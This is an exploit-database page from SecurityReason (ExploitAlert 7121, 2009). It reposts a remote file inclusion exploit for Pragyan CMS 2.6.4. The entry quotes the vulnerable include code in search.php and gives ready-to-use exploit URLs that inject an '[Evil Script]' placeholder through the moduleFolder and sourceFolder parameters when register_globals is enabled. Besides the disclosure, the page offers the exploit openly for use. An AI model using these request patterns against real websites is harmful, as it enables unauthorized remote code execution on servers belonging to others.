|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7121 Credit : Mr.SeCreT Date : 04.09.2009 Exploit Code : # SecurityReason Note : # # register_globals = On # ###################### Author: ############################# Author: Mr.SeCreT E-mail: g-ff@hotmail.com From: Syria Greatz To: All My Friends and Tryag.cc/cc members and moderators ############## Script Information: ######################### Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability Language: PHP Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4. tar.gz ################### Vul Code: ############################## $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; $include_dir = "$searchModuleFolder/include"; include ("$include_dir/commonfuncs.php"); ################### Exploit: ############################### www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil Script] www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil Script] ############################################################ The End  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |